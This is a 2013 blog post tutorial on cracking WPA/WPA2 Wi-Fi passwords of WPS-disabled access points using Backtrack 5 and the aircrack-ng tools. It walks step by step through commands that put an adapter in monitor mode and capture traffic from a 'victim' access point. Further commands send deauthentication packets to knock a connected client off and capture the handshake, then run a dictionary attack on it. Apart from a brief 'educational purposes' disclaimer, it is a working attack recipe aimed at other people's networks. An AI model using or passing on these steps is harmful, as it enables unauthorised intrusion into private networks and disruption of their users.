Join Probux to get paid for clicking on links!!

Saturday, August 17, 2013

How to Hack a WPA/WPA2 encrypted wireless Network with Backtrack 5 for WPS disabled Access Points

Hacking a WPA/WPA2 encryped network for WPS disabled Access Points

Caution:The contents below may be used only for educational purposes. If anyone uses it for illegal purposes, he/she may be responsible for its outcomes themselves.


         Previously, I posted on Hacking a WPA/WPA2 wireless network with Reaver. Using Reaver is a great method for hacking a WPA/WPA2 network. But, its drawback is that WPA/WPA2 networks are vulnerable to Reaver only if they are WPS enabled. If the network is not WPS enabled, Reaver cannot help you hacking that access point. So in this tutorial, I'll be teaching you to hack a WPA/WPA2 encrypted wireless network for WPS disabled access points. I've posted a tutorial on hacking a WEP wireless network on Hacking a WEP Network with Backtrack 5.

        So, what we're gonna do in this tutorial is capture the packets from the targeted  AP (Access Point) and try to capture a WPA Handshake. Once we obtain a WPA Handshake, we attack using a dictionary attack. Dictionary attack means using a list of probable passwords and testing each of them. There are a lots of wordlists out there. Search for them in google. Be patient and you'll get it hacked.

  First Things First

        First, you will need to have a Wireless Network Adapter that supports Monitor Mode and Packet Injection. You can see a list of such compatible wireless adapters in my previous post Compatible Wireless Adapters. If you already own a wireless adapter and want to test if it supports Packet Injection or not, see my post on Testing Compatibility of Wireless Adapter.
       You will also need Backtrack 5. You will need to create a Live USB/DVD (bootable) to boot Backtrack 5. I have demonstrated on that on my post Hacking a WPA/WPA2 wireless network with Reaver

Lets Get Started 

       After you're all set, lets get started and boot Backtrack 5. After booting up Backtrack, open a terminal and type in:

      This command will show you the list of interfaces of your PC. Note the name of  your wireless interface. In most cases, the wireless network interface name is "wlan0". Now we need to put our network adapter in Monitor mode. For enabling the monitor mode, type:

airmon-ng start wlan0

       Once you enable the monitor mode, your network adapter will now be capable of interfering with other networks and capture their packets. Also note that after enabling monitor mode, your interface name will be "mon0". Now lets monitor all the access points around your locality. Type:

airodump-ng mon0

      Entering this command will make your network adapter search for all the available networks in the vicinity. Keep searching until your victim (your targeted access point) appears. After that, you can stop searching by pressing Ctrl+C in your keyboard. It will show many informations about the access point. Informations like Bssid, Channel No.,Essid should be noted, which we shall use in our next command. Now all we need to do is capture a WPA Handshake from the AP (access point). So we start an airodump to capture the packets from the AP. For starting airodump to capture packets type:

airodump-ng -c (channel no.) --bssid (bssid of victim) -w (o/p filename) mon0

      After entering the above command, it will start capturing packets from the AP. In order to capture the WPA Handshake, we need to deauthenticate a client that is connected to the AP. Wait till a station/client appears. Sometimes it takes a little time for the station to show up. After a station shows up, start a deauthentication attack on that station. Keep airodump-ng running, open a new terminal and start a deauthentication attack by typing in:

aireplay-ng -0 5 -a (bssid of victim) -c (mac address of station/client) mon0

      After we enter the above command, it will start sending DeAuthenticating Packets. It may take a while for you to deauthenticate the client. Be patient and wait. A message should appear on the top right corner your airodump-ng window notifying that WPA Handshake is obtained. I've shown a snapshot on how it looks below.

       Now that we have obtained a WPA Handshake, the next step is to initiate a dictionary attack on the capture file. For a dictionary attack, we'll need a wordlist which is all over the internet. Open a new terminal and type "ls" to see the files in your current directory (directory is root by default). Note the name of your capture file. Then, initiate a dictionary attack by typing in:

aircrack-ng -w (path to wordlist file)  (capture filename)

         If you get confused about how to enter the path to the wordlist file, type "aircrack-ng -w " and drag the file into the terminal. Once you hit enter to this command, it will start testing all the words present in the wordlist.  If your wordlist contains the correct paraphrase, it will be hacked. A snapshot of how it looks is given below:

 So this is how you hack a WPA/WPA2 network with dictionary attack. This method can hack any WPA/WPA2 network provided that your wordlist contains the correct paraphrase.
         Now, here's little sad part. For hacking the password, your wordlist must contain the exact phrase of the password. Its a little frustrating trying it out. But there is a huge collection of wordlists out there. Try them out, and be patient with it. Good Luck!!

Please leave a comment below and if you have any problems regarding this, feel free to ask in the comment section.